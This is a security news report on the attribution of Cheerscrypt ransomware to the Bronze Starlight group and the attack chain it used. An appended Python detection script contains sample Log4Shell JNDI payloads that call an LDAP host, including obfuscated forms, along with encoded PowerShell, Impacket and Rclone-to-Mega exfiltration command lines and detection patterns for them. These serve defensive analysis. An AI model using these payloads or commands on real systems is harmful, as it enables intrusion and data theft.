Researchers at cybersecurity firm Sygnia attributed the recently discovered Linux ransomware Cheerscrypt to the China-linked cyber espionage group Bronze Starlight (aka DEV-0401, APT10).
Bronze Starlight has been active since mid-2021. In June, researchers from Secureworks reported that the APT group deploys post-intrusion ransomware families to cover up its cyber espionage operations.
The experts observed an activity cluster involving post-intrusion ransomware such as LockFile, Atom Silo, Rook, Night Sky, Pandora, and LockBit 2.0.
“Sygnia recently investigated a Cheerscrypt ransomware attack which utilized Night Sky ransomware TTPs. Further analysis revealed that Cheerscrypt and Night Sky are both rebrands of the same threat group, dubbed ‘Emperor Dragonfly’ by Sygnia,” reads the post published by Sygnia.
“‘Emperor Dragonfly’ (A.K.A. DEV-0401 / BRONZE STARLIGHT) deployed open-source tools that were written by Chinese developers for Chinese users. This reinforces claims that the ‘Emperor Dragonfly’ ransomware operators are based in China. Contrary to publicly available information, Cheerscrypt ransomware makes use of payloads that target both Windows and ESXi environments.”
Cheerscrypt was first analyzed by Trend Micro in May 2022. Like other ransomware families employed by the APT group, the Cheerscrypt encryptor was built from the source code of Babuk ransomware, which was leaked online in June 2021.
Unlike other ransomware gangs, the DEV-0401 group doesn’t rely on a network of affiliates; it directly manages every phase of the attack chain, from initial access to data exfiltration.
In attacks that took place in January 2022, the hackers gained initial access to VMware Horizon servers by exploiting the critical Log4Shell vulnerability in Apache Log4j, then dropped a PowerShell payload used to deliver an encrypted Cobalt Strike beacon.
The attackers also delivered three Go-based tools along with the beacon: a keylogger that uploads the captured keystrokes to Alibaba Cloud, a customized version of the internet proxy utility iox, and the tunneling software NPS.
The attackers used the Impacket open-source toolkit to perform reconnaissance and move laterally within the target network.
The threat actors used the Rclone open-source command-line tool to exfiltrate sensitive information to the cloud storage service Mega, then they delivered the Cheerscrypt ransomware.
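As an added defender's example (not code from the article or from Sygnia's report), the following Python sketch turns the chain described above into correlated detections: it normalises obfuscated Log4j lookups before matching `${jndi:` in web-log user-agents, flags the encoded PowerShell loader, Impacket's wmiexec output redirection and Rclone transfers to a Mega remote in process command lines, and groups the hits per host. All hostnames, IP addresses and command lines in the sample telemetry are constructed.

```python
import re

# Constructed sample telemetry (Horizon web-log user-agents plus endpoint
# process-creation command lines); not taken from the article.
SAMPLE_EVENTS = [
    {"type": "http", "host": "horizon-cs01", "ua": "${jndi:ldap://203.0.113.5:1389/a}"},
    {"type": "http", "host": "horizon-cs01", "ua": "${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/a}"},
    {"type": "http", "host": "horizon-cs01", "ua": "Mozilla/5.0"},
    {"type": "proc", "host": "horizon-cs01", "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoACcAaAAnACkA"},
    {"type": "proc", "host": "fs01", "cmd": "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1663240012.45 2>&1"},
    {"type": "proc", "host": "fs01", "cmd": "rclone.exe copy D:\\Finance mega:exfil --transfers 32"},
]

# One Log4j lookup wrapping a single character: ${lower:j}, ${::-j}, ${env:NaN:-j}.
LOOKUP_RE = re.compile(r"\$\{(?:[^{}]*:)?-?(.)\}")

def unwrap_log4j_lookups(value: str) -> str:
    """Collapse nested single-char lookups until nothing changes, e.g. ${${lower:j}ndi: -> ${jndi:."""
    previous = None
    while previous != value:
        previous, value = value, LOOKUP_RE.sub(r"\1", value)
    return value

def is_log4shell_probe(value: str) -> bool:
    return "${jndi:" in unwrap_log4j_lookups(value).lower()

# Post-exploitation stages named in the article, keyed on process command lines.
PROCESS_RULES = {
    # Encoded PowerShell loader (the stage that delivered the beacon).
    "powershell_encoded_loader": re.compile(r"powershell(?:\.exe)?\b.*\s-(?:e|ec|enc|encodedcommand)\s", re.I),
    # Impacket wmiexec.py redirects command output to ADMIN$\__<timestamp> on the target.
    "impacket_wmiexec_output_redirect": re.compile(r"cmd\.exe /Q /c .*1> \\\\127\.0\.0\.1\\ADMIN\$\\__\d+", re.I),
    # Rclone copying to a Mega remote (a renamed binary needs other telemetry, e.g. its config file).
    "rclone_to_mega": re.compile(r"\brclone(?:\.exe)?\b.*\bmega:", re.I),
}

def classify_event(event: dict) -> list:
    """Names of the rules an event triggers; empty for benign events."""
    if event["type"] == "http":
        return ["log4shell_jndi_probe"] if is_log4shell_probe(event["ua"]) else []
    return [name for name, rx in PROCESS_RULES.items() if rx.search(event["cmd"])]

def scan(events: list) -> dict:
    """Rule hits per host in event order, so an analyst sees the stages as one chain."""
    per_host = {}
    for event in events:
        for name in classify_event(event):
            per_host.setdefault(event["host"], []).append(name)
    return per_host
```

A host that accumulates hits from more than one stage (for example a JNDI probe followed by an encoded PowerShell launch) is the signal worth escalating, rather than any single rule on its own.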
Researchers shared Indicators of Compromise (IoCs) along with the following suggestions to defend against DEV-0401’s attacks.
- Identify and patch critical vulnerabilities.
- Limit outbound internet access from servers.
- Protect the virtualization platform.
- Limit lateral movement through the network.
- Protect privileged accounts.